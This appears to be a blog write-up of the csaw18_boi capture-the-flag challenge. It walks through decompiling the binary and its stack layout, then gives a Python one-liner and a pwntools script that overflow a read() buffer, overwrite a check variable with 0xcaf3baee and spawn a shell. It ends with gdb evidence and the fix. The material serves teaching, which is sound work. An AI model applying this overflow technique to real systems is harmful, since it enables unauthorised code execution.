Security CTF - Nightmare Module 04 - csaw18_boi
Introduction
Nightmare is a collection of security related Capture the Flag (CTF) challenges focused on binary exploitation. They’re grouped into modules that each introduce new concepts in order of escalating complexity.
The goal of a security CTF challenge is to analyze a previously unknown program, and then exploit it in order to complete an objective. The goal is usually to extract a hidden value (i.e. the ‘flag’) from the challenge program, or to exploit the program to get an interactive shell.
Module 04 focuses on using stack buffer overflows to manipulate the values of variables on the stack. It’s comprised of three CTF challenges: csaw18_boi, tamu_pwn1, tw17_justdoit.
This post documents my progress working through the csaw18_boi challenge. This challenge was part of Cybersecurity Awareness Worldwide’s (CSAW) 2018 Capture The Flag event.
Tools
- Linux file command
- checksec utility (pwntools implementation of checksec.sh)
- Ghidra disassembler/decompiler
- pwntools scripting framework
- gdb debugger w/GEF extension
csaw18_boi
The csaw18_boi challenge contains a binary file named boi. We start by gathering some basic information about the file.
file command
We learn that it’s a 64 bit ELF executable, dynamically linked and hasn’t had it symbol information stripped form it (which makes reverse engineering it easier).
1ctf@ctf2204:csaw18_boi$ file ./boi
2
3boi: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=1537584f3b2381e1b575a67cba5fbb87878f9711, not strippedchecksec
Checksec reveals non-executable stack/DEP protection is not enabled for this binary, but stack canary protections are.
1ctf@ctf2204:csaw18_boi$ checksec ./boi
2[*] '/home/ctf/projects/nightmare/modules/04-bof_variable/csaw18_boi/boi'
3 Arch: amd64-64-little
4 RELRO: Partial RELRO
5 Stack: Canary found
6 NX: NX enabled
7 PIE: No PIE (0x400000)main() Ghidra Decompiler Listing
I’ve used Ghidra to dissassemble & decompile the binary. After some analysis & renaming of variables for clarity the main() function’s decompilation is as follows.
1// Variables have been renamed in Ghidra to clarify their usage
2undefined8 main(void)
3
4{
5 long in_FS_OFFSET;
6 undefined8 userInput;
7 undefined8 stack_junk1;
8 undefined4 stack_junk2;
9 uint checkValue;
10 undefined4 stack_junk3;
11 long stack_canary;
12
13 stack_canary = *(long *)(in_FS_OFFSET + 0x28);
14
15 userInput = 0;
16 stack_junk1 = 0;
17 stack_junk2 = 0;
18 stack_junk3 = 0;
19
20 checkValue = 0xdeadbeef;
21
22 puts("Are you a big boiiiii??");
23 read(0,&userInput,0x18);
24
25 if (checkValue == 0xcaf3baee) {
26 run_cmd("/bin/bash");
27 }
28 else {
29 run_cmd("/bin/date");
30 }
31
32 if (stack_canary != *(long *)(in_FS_OFFSET + 0x28)) {
33 /* WARNING: Subroutine does not return */
34 __stack_chk_fail();
35 }
36 return 0;
37}Analysis
Line 22: Prints “Are you a big boiiiii??” with puts()
Line 23: Using read(), receives 0x18 bytes from stdin (file descriptor 0) and writes them to the stack allocated memory of variable userInput (declared on Line 6).
Line 25-30: An if statement to compare the value of stack variable checkValue against hardcoded literal value 0xcaf3baee. If they are equal, call run_cmd(’/bin/bash’). If they are not equal, call run_cmd(’/bin/date’). Note that checkValue has already been initialized with a value that doesn’t match the hardcoded value in the if statement (Line 20)
Line 13, 32-35: Set & check a stack canary value. This is a security mechanism to protect against stack frame corruption & overwriting the return address on the stack. Not relevant to this example but we will see more about this in later Nightmare modules.
run_cmd() is a function defined in this binary as a wrapper of system()
1void run_cmd(char *param_1)
2
3{
4 system(param_1);
5 return;
6}So the user enters input after which the program chooses between executing /bin/bash and /bin/date with system().
We want to get it to execute /bin/bash and get a shell.
The problem is that based on the normal execution flow shown in the decompiler listing the user input has no effect on checkValue, it only goes into userInput.
The key detail here is the number of bytes the read() call will receive. It’s reading 24 bytes starting at the address of the stack allocated variable userInput. If we look at the stack layout and tally up the memory that’s been allocated for each variable (Ghidra’s Stack Frame Editor gives a good view of the stack frame layoutn) … it becomes apparent that the read() call will allow our user input to overflow beyond the stack memory allocated for variable userInput and into the memory meant for the checkValue variable used in the conditional logic. This will allow us to change the value of the checkValue variable at runtime if we craft our input correctly, and as a result control the execution flow through the if statement.
The region of stack memory we’re interested in will look like this at runtime
Addr N =========================
= userInput (8 bytes) = <= read() starts writing bytes here, moving 'down' the stack
Addr N+0x08 =========================
= stack_junk1 (8 bytes) =
Addr N+0x10 =========================
= stack_junk2 (4 bytes) =
Addr N+0x14 =========================
= checkValue (4 bytes) = <= the variable checked by the if statement
Addr N+0x18 =========================
= stack_junk3 (4 bytes) =
=========================
So if we provide 20 bytes (0x14) of input we’ve filled everything right up until the start of checkValue. If we provide 4 more bytes for a total of 24 (0x18) we’ve filled everything up to and including the memory allocated on the stack for checkValue. This will allow us to ‘plant’ the value 0xcaf3baee and control execution through the if statement by making the comparison evaluate to true.
Exploitation
TLDR - The following command will successfully exploit the boi exectutable and overwrite the value of the checkValue variable with 0xcaf3baee:
1ctf@ctf2204:csaw18_boi$ cat <(python3 -c "import sys;sys.stdout.buffer.write(b'A'*20+b'\xee\xba\xf3\xca')") - | ./boi
2Are you a big boiiiii??
3echo $$
41914
5ps f
6 PID TTY STAT TIME COMMAND
7 1101 pts/2 Ss 0:00 -bash
8 1177 pts/2 S+ 0:00 \_ vim my_exploit.py
9 1072 pts/1 Ss 0:00 -bash
10 1909 pts/1 S+ 0:00 \_ cat /dev/fd/63 -
11 1911 pts/1 Z+ 0:00 | \_ [bash] <defunct>
12 1910 pts/1 S+ 0:00 \_ ./boi
13 1913 pts/1 S+ 0:00 \_ sh -c /bin/bash
14 1914 pts/1 S+ 0:00 \_ /bin/bash
15 1916 pts/1 R+ 0:00 \_ ps f
16 1007 pts/0 Ss 0:00 -bash
17 1069 pts/0 S+ 0:00 \_ tmuxWe see the “Are you a big boiiiii??"puts() output and then the execution seems to pause and wait. It’s actually waiting for our input because it’s spawned a bash shell. In the example above I’ve echo’d $$ to show our current PID, and then displayed a process tree using pstree. We can see in the tree that the boi executable is PID 1910 and it spawned a child process 1913 that ran sh -c /bin/bash (the call to system(), see the man page for system()). And in turn 1913 spawned a child process 1914 which is our actual bash shell.
So we’ve successfully diverted the execution flow of the if statement to spawn us a shell.
But that command is pretty gnarly. We’re using process substitution on our Python one-liner (PID 1911), redirecting that into cat where we also have a trailing ‘-’ character to keep stdin open so our shell doesn’t exit immediately. Doing this sort of exploit directly in the shell like this can be tricky & frustrating to troubleshoot. Read more about the tricks to get it working here
This is where the pwntools framework really shines. It has a whole lot of functionality to interact with process, redirect intput/output, automate attaching a debugger, etc… It’s a swiss army knife for CTF & exploit development.
You’ll need to read the docs & play with it to really get up to speed with it’s capabilities. The Getting Started section runs through the main concepts.
Below is the Python script I wrote using pwntools to solve this challenge.
1#!/usr/bin/env python3
2
3from pwn import *
4import os
5
6log.info("My exploit script's PID: {}".format(os.getpid()))
7
8
9# pwntools config telling it what command to use
10# to spawn new terminals if it runs a command that
11context.terminal = ["tmux", "new-window"]
12
13variable_overwrite_payload = b'\xee\xba\xf3\xca'
14
15# run our target process under gdb
16
17# io = gdb.debug("./boi", gdbscript='''
18# set follow-fork-mode child
19# b *main+103
20# continue
21# ''')
22
23# or run our target process directly
24# object returned & stored in 'io' lets us interact
25# with the process programmatically
26io = process("./boi")
27
28log.info("Sending payload...")
29
30# Send our payload to the process's stdin.
31# At this point it's waiting at the read() call to receive input
32# 20 bytes of the character 'A' + 4 bytes of the value 0xcaf3baee
33io.send(b"A"*20+variable_overwrite_payload)
34
35log.info("Sent.")
36
37# drop into an interactive shell connected to the stdin/stdout
38# of our target process
39io.interactive()And the output of running the script. Nice tidy output, no wild bash trickery to redirect stdin/stdout. The pwntools framework handles all of that for us and provides a nice, high level scripting API.
1ctf@ctf2204:csaw18_boi$ ./my_exploit.py
2[*] My exploit script's PID: 1949
3[+] Starting local process './boi': pid 1952
4[*] Sending payload...
5[*] Sent.
6[*] Switching to interactive mode
7Are you a big boiiiii??
8$ echo $$
91955
10$ ps f
11 PID TTY STAT TIME COMMAND
12 1101 pts/2 Ss 0:00 -bash
13 1949 pts/2 Sl+ 0:00 \_ python3 ./my_exploit.py
14 1952 pts/3 Ss+ 0:00 \_ ./boi
15 1953 pts/3 S+ 0:00 \_ sh -c /bin/bash
16 1955 pts/3 S+ 0:00 \_ /bin/bash
17 1956 pts/3 R+ 0:00 \_ ps f
18 1072 pts/1 Ss+ 0:00 -bash
19 1007 pts/0 Ss 0:00 -bash
20 1069 pts/0 S+ 0:00 \_ tmuxIf we watch the process under GDB as it receives our input we can observe the variable being overwritten in the process memory.
I’ve set breakpoints just before the read() call occurs (address main+95) and just before the if statement comparison occurs (address main+103).
1 0x000000000040068f <+78>: lea rax,[rbp-0x30]
2 0x0000000000400693 <+82>: mov edx,0x18
3 0x0000000000400698 <+87>: mov rsi,rax
4 0x000000000040069b <+90>: mov edi,0x0
5=> 0x00000000004006a0 <+95>: call 0x400500 <read@plt> <= break 1
6 0x00000000004006a5 <+100>: mov eax,DWORD PTR [rbp-0x1c]
7 0x00000000004006a8 <+103>: cmp eax,0xcaf3baee <= break 2
8 0x00000000004006ad <+108>: jne 0x4006bb <main+122>
9 0x00000000004006af <+110>: mov edi,0x40077c
10 0x00000000004006b4 <+115>: call 0x400626 <run_cmd>With the process waiting at main+95, before the read() call our stack looks like this:
1gef➤ hexdump qword --size 5 $rsp
20x00007ffc544b7f90│+0x0000 0x00007ffc544b80e8
30x00007ffc544b7f98│+0x0008 0x0000000101000000
40x00007ffc544b7fa0│+0x0010 0x0000000000000000
50x00007ffc544b7fa8│+0x0018 0x0000000000000000
60x00007ffc544b7fb0│+0x0020 0xdeadbeef00000000We can see the value 0xdeadbeef sitting there in stack memory on the last line. This is the value the variable checkValue was initialized to. This is what we want to overwrite. The specific stack addresses will vary each run due to ASLR but the relative offset of the variable’s memory from the head of the stack while at this breakpoint will always remain the same (+0x0020).
When we continue to our next breakpoint at main+103, after the read() call, at the comparison operation for the if statement, our stack looks like this:
1gef➤ hexdump qword --size 5 $rsp
20x00007ffdd7e88970│+0x0000 0x00007ffdd7e88ac8
30x00007ffdd7e88978│+0x0008 0x0000000100000000
40x00007ffdd7e88980│+0x0010 0x4141414141414141
50x00007ffdd7e88988│+0x0018 0x4141414141414141
60x00007ffdd7e88990│+0x0020 0xcaf3baee41414141Starting on the third line we see the value 41 repeating. These are the 20 letter ‘A’ we sent as part of our input. 0x41 is the hex ASCII code for ‘A’.
And on the last line of the output above we can confirm that we did in fact overwrite checkValue with the value from our input. We see 0xcaf3baee there.
This causes the conditional’s equality check to evaluate to true and execute /bin/bash giving us a shell.
Conclusion
This challenge presents a pretty straight forward stack buffer overflow due to an incorrect bounds for the read() call. This makes it possible to overwrite the variable adjacent to our input buffer, which is then used in subsequent conditional logic. Gaining control of the value of this variable using crafted input lets us affect the execution flow of the program through this conditional logic.
The fix would be to read the correct amount of bytes for the amount of memory we’ve allocated as an input buffer. In this example they have set a bound on the number of bytes to read but it’s too large a value for the amount of memory they’ve allocated on the stack.
This challenge represents ‘baby steps’ towards exploiting more complex buffer overflows involving gaining control of a stack frame’s return address. No security mitigations needed to be bypassed to solve this one (DEP/NX, ASLR, PIE). As mentioned above a stack canary is present and checksec indicates that NX is enabled but since we only needed to overwrite an adjacent variable to influence an existing conditional control flow check we didn’t come into contact with these security features.
More on these in upcoming posts. Stay tuned!